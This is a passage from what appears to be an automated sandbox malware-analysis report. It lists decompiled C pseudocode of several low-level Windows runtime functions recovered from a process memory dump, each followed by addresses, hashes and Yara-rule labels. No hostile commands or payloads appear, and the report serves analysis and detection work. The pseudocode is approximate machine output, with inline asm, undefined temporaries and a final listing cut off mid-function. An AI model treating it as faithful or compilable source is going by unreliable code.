						if(L045F6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04615E50(0x45cc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0461B230(_v32, _v28, 0x45cc2d8, 1,  &_v24);
								_t28 = E045EF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x045eaa25
0x045eaa29
0x045eaa2d
0x045eaa30
0x045eaa37
0x045eaa3c
0x04644458
0x04644458
0x04644472
0x04644474
0x04644476
0x045eaa64
0x045eaa74
0x0464447c
0x04644483
0x04644492
0x045eaa52
0x045eaa54
0x045eaa5e
0x046444a8
0x046444ad
0x046444af
0x046444b6
0x046444b6
0x046444b9
0x046444bc
0x046444cd
0x046444d3
0x046444d6
0x046444e1
0x046444e1
0x046444e6
0x046444e8
0x046444fb
0x046444fb
0x046444e8
0x00000000
0x045eaa5e
0x04644476
0x045eaa42
0x045eaa46
0x045eaa48
0x045eaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805cc0d22397774377bea36a36649f8d8cd3c39a9e7247e7a426b3f9dfbffdd9
Instruction ID: e5d97897f68d84faa949504b04168b64f3be0abbc49f35ed543449691518f80f
Opcode Fuzzy Hash: 805cc0d22397774377bea36a36649f8d8cd3c39a9e7247e7a426b3f9dfbffdd9
Instruction Fuzzy Hash: 5E31BF71A00619ABDF159FA5CD81A7FB7B8FF84704B014469F901E6250FB34BD11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04628EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04628EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x46dd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04614E70(0x46d86e4, 0x4629490, 0, 0);
					if( *0x46d53e8 > 5 && E04628F33(0x46d53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x46d53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x46d53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x45cbc46;
						_t48 = E04667B9C(0x46d53e8, 0x45cbc46, _t67, 0x46d53e8, _t70,  &_v140);
					}
				}
				return E0462B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04628ec7
0x04628ed9
0x04628edc
0x04628ee6
0x04628ee9
0x04628eee
0x04628efc
0x04628f08
0x04661349
0x04661353
0x0466135d
0x04661366
0x0466136f
0x04661375
0x0466137c
0x04661385
0x04661390
0x04661391
0x0466139c
0x0466139d
0x046613a6
0x046613ac
0x046613b2
0x046613b5
0x046613bc
0x046613bf
0x046613c2
0x046613c5
0x046613c8
0x046613cb
0x046613ce
0x046613d1
0x046613d4
0x046613d7
0x046613da
0x046613dd
0x046613e0
0x046613e3
0x046613e6
0x046613e9
0x046613f6
0x04661400
0x04661400
0x04628f08
0x04628f32

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d88e76986455a60fc98773bedf443efa87e98c336a2b15928014bc4336725a7
Instruction ID: e0214b9302774c9dcf65cd9f54c06c19d42c172260c74d0dede69bee5e474a46
Opcode Fuzzy Hash: 4d88e76986455a60fc98773bedf443efa87e98c336a2b15928014bc4336725a7
Instruction Fuzzy Hash: 2141B1B1D00728AFDB20DFAAD980AADFBF4FB48314F5041AEE519A7600E7746A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04624A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04624A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x46dd360 ^ _t62;
				_v8 =  *0x46dd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04602280(_t26, 0x46d8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E045FFFB0(_t41, _t51, 0x46d8608);
						L2:
						 *0x46db1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0462B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04602280(_t28, 0x46d8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E045FFFB0(_t42, _t53, 0x46d8608);
							if(_t53 != 0) {
								L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E045FFFB0(_t41, _t51, 0x46d8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04624a2c
0x04624a34
0x04624a3c
0x04624a3e
0x04624a48
0x04624a4b
0x04624a4d
0x04624a51
0x04624a9c
0x00000000
0x00000000
0x04624aa3
0x04624aa8
0x04624aad
0x04624ab1
0x04624ade
0x04624ae3
0x04624a5a
0x04624a62
0x04624a6a
0x04624a6e
0x0465f203
0x04624a84
0x04624a88
0x04624a89
0x04624a8a
0x04624a95
0x04624a95
0x04624a79
0x04624a80
0x04624af2
0x04624af4
0x04624af9
0x04624aff
0x04624b01
0x04624b03
0x04624b08
0x0465f20a
0x0465f212
0x0465f216
0x0465f216
0x04624b08
0x04624b13
0x04624b1a
0x0465f229
0x0465f229
0x04624b1a
0x04624a82
0x00000000
0x04624a82
0x04624ab7
0x04624acd
0x04624acd
0x04624ad5
0x04624ada
0x00000000
0x04624ada
0x04624ac2
0x04624acb
0x00000000
0x00000000
0x00000000
0x04624acb
0x04624a53
0x04624a53
0x04624a58
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d5deefb3992aecacf9479badd7bc84fbd0dce9d140923401813e0fc4db8c8e
Instruction ID: 2f4f5e0101f1d953efcf5ad5cb8cbf2df582c0b6dcaa6fe2ed9ef5d67034d400
Opcode Fuzzy Hash: f5d5deefb3992aecacf9479badd7bc84fbd0dce9d140923401813e0fc4db8c8e
Instruction Fuzzy Hash: 6F31F332701A61BBD721AF55CE48B2AB7A4FF81B14F004469E9564B644FBB0F804CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0461E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0461E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04629670() < 0) {
					L0463DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x46d7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04604620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0461E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0461e730
0x0461e736
0x0461e738
0x0461e73d
0x0461e73e
0x0461e740
0x0461e749
0x0461e765
0x0461e76a
0x0461e76b
0x0461e76c
0x0461e76d
0x0461e76e
0x0461e76f
0x0461e775
0x0461e777
0x0461e77e
0x0465b675
0x0461e784
0x0461e784
0x0461e789
0x0461e7a8
0x0461e7ac
0x0461e807
0x0461e7ae
0x0461e7ae
0x0461e7b1
0x0461e7b4
0x0461e7b9
0x0461e7c0
0x0461e7c4
0x0461e7ca
0x0461e7cc
0x00000000
0x0461e7d3
0x0461e7d6
0x00000000
0x00000000
0x0461e7ff
0x0461e802
0x00000000
0x00000000
0x0461e7f9
0x0461e7fc
0x00000000
0x00000000
0x0461e7f3
0x0461e7f6
0x00000000
0x00000000
0x0461e7ed
0x0461e7f0
0x00000000
0x00000000
0x0461e7e7
0x0461e7ea
0x00000000
0x00000000
0x0465b685
0x0465b688
0x00000000
0x00000000
0x0465b682
0x00000000
0x00000000
0x0461e7cc
0x0461e7d9
0x0461e7dc
0x0461e7de
0x0461e7de
0x0461e7ac
0x0461e7e4
0x0461e74b
0x0461e751
0x0461e759
0x0461e761
0x0461e761

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ee68a212f93bfd68d95c8fb2b14193d15393177419009d04f267f38250a85a
Instruction ID: 8a1a814747841eee5549bffdc470597166bed8ad54c85b0ea5756d06f638f001
Opcode Fuzzy Hash: f3ee68a212f93bfd68d95c8fb2b14193d15393177419009d04f267f38250a85a
Instruction Fuzzy Hash: B3316D75A14249EFE744CF58D841B9AB7E4FB19314F18826AFD04CB351E632ED90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0461BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0461BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x46d6100; // 0x33
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04602280(0xd, 0x1622f1a0);
				_t41 =  *0x46d60f8; // 0x0
				if(_t41 != 0) {
					 *0x46d60f8 =  *_t41;
					 *0x46d60fc =  *0x46d60fc + 0xffff;
				}
				E045FFFB0(_t41, 0x800, 0x1622f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x46d60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04604620(0x46d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x46d6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0461bc36
0x0461bc42
0x0461bc45
0x0461bc4a
0x0461bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0461bc50
0x0461bc50
0x0461bc58
0x0461bc5a
0x0461bc60
0x00000000
0x00000000
0x0465a4f2
0x0465a4f6
0x00000000
0x00000000
0x00000000
0x0465a4fc
0x0461bc79
0x0461bc7e
0x0461bc86
0x0461bd16
0x0461bd20
0x0461bd20
0x0461bc8d
0x0461bc94
0x0461bcbd
0x0461bcca
0x0461bccb
0x0461bccc
0x0461bccd
0x0461bcce
0x0461bcd4
0x0461bcea
0x0461bcee
0x0461bcf2
0x0461bd00
0x0461bd04
0x00000000
0x0461bc96
0x0461bcab
0x0461bcaf
0x0461bd2c
0x0461bd2c
0x0461bd09
0x00000000
0x0461bd09
0x0461bcb1
0x0461bcb5
0x0461bcbb
0x00000000
0x00000000
0x00000000
0x0461bcbb

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd05b33a0b183dfff94c9c68ce0b223dcad94f0f690166621cf5906af8cbf9b
Instruction ID: f7b85b0335b24b12d0de5547672411aa33c14a9def5ef50e473e7c0986bd1ae1
Opcode Fuzzy Hash: 5bd05b33a0b183dfff94c9c68ce0b223dcad94f0f690166621cf5906af8cbf9b
Instruction Fuzzy Hash: 6131DB72A016569BDB11DF98D8807A673A4EB28714F08407AED49EB311FB78FD068B84

Uniqueness

Uniqueness Score: -1.00%

Function 04611DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04611DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0460F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04604620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0460F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04611dc2
0x04611dc5
0x04611dc7
0x04611dcc
0x04611dce
0x04611dd6
0x04611ddf
0x04611de0
0x04611de1
0x04611de5
0x04611de8
0x04611def
0x04611df0
0x04611df6
0x04611df7
0x04611dfe
0x04611e1a
0x00000000
0x00000000
0x04611e0b
0x04611e12
0x04611e12
0x04611e00
0x04611e00
0x04611e05
0x04611e1e
0x04611e23
0x0465570f
0x04655713
0x00000000
0x00000000
0x04655719
0x04655719
0x04611e2c
0x04611e2d
0x04611e2e
0x04611e2f
0x04611e31
0x04611e32
0x04611e35
0x04611e3d
0x04655723
0x0465573d
0x0465573d
0x00000000
0x04655723
0x04611e49
0x04611e4e
0x04611e4e
0x04611e09
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 36a6b8fc7a1ecf1129f7a5934edde3b137e3d89ff75b9a45e830c4a62e914cb8
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: DB216071700119AFD725CF99CC80EABBBB9EF8A684F154155EA05D7260EA34BD01D790

Uniqueness

Uniqueness Score: -1.00%

Function 045E9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E045E9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x46bf6e8);
				E0463D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E046B88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0463D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x46d86c0; // 0xa007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x46d86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04602280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E046B88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0462AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x46db1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x46d84c0;
										if(_t69 >=  *0x46d84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E046B9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E045E922A(_t82);
							_t53 = E04607D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E046B8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x46d86c0; // 0xa007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x46d86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x46d86bc;
										_t72 = 0x46d86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E045E9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x46d86c4;
									_t72 = 0x46d86c0;
									L18:
									E04619B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x045e9100
0x045e9100
0x045e9100
0x045e9100
0x045e9102
0x045e9107
0x045e910c
0x045e9110
0x045e9115
0x045e9136
0x045e9143
0x046437e4
0x046437e4
0x045e9149
0x045e914e
0x045e914e
0x045e9117
0x045e911d
0x00000000
0x00000000
0x045e911f
0x045e9125
0x00000000
0x045e9151
0x045e9158
0x045e915d
0x045e9161
0x045e9168
0x04643715
0x00000000
0x045e916e
0x045e916e
0x045e9175
0x045e9177
0x045e917e
0x045e917f
0x045e9182
0x045e9182
0x045e9187
0x045e9187
0x045e918a
0x045e918d
0x045e918f
0x045e9192
0x045e9195
0x045e9198
0x045e9198
0x045e9198
0x045e919a
0x00000000
0x00000000
0x0464371f
0x04643721
0x04643727
0x0464372f
0x04643733
0x04643735
0x04643738
0x0464373b
0x0464373d
0x04643740
0x00000000
0x00000000
0x04643746
0x04643749
0x00000000
0x00000000
0x0464374f
0x04643751
0x00000000
0x00000000
0x04643757
0x04643759
0x0464375c
0x0464375c
0x0464375e
0x0464375e
0x04643761
0x04643764
0x00000000
0x00000000
0x04643766
0x04643768
0x046437a3
0x046437a3
0x046437a5
0x046437a7
0x046437ad
0x046437b0
0x046437b2
0x046437bc
0x046437c2
0x046437c2
0x046437b2
0x045e9187
0x045e9187
0x045e918a
0x045e918d
0x045e918f
0x045e9192
0x045e9195
0x00000000
0x045e9195
0x00000000
0x045e9187
0x0464376a
0x0464376a
0x0464376c
0x0464376c
0x0464376f
0x04643775
0x00000000
0x00000000
0x04643777
0x04643779
0x00000000
0x00000000
0x04643782
0x04643787
0x04643789
0x04643790
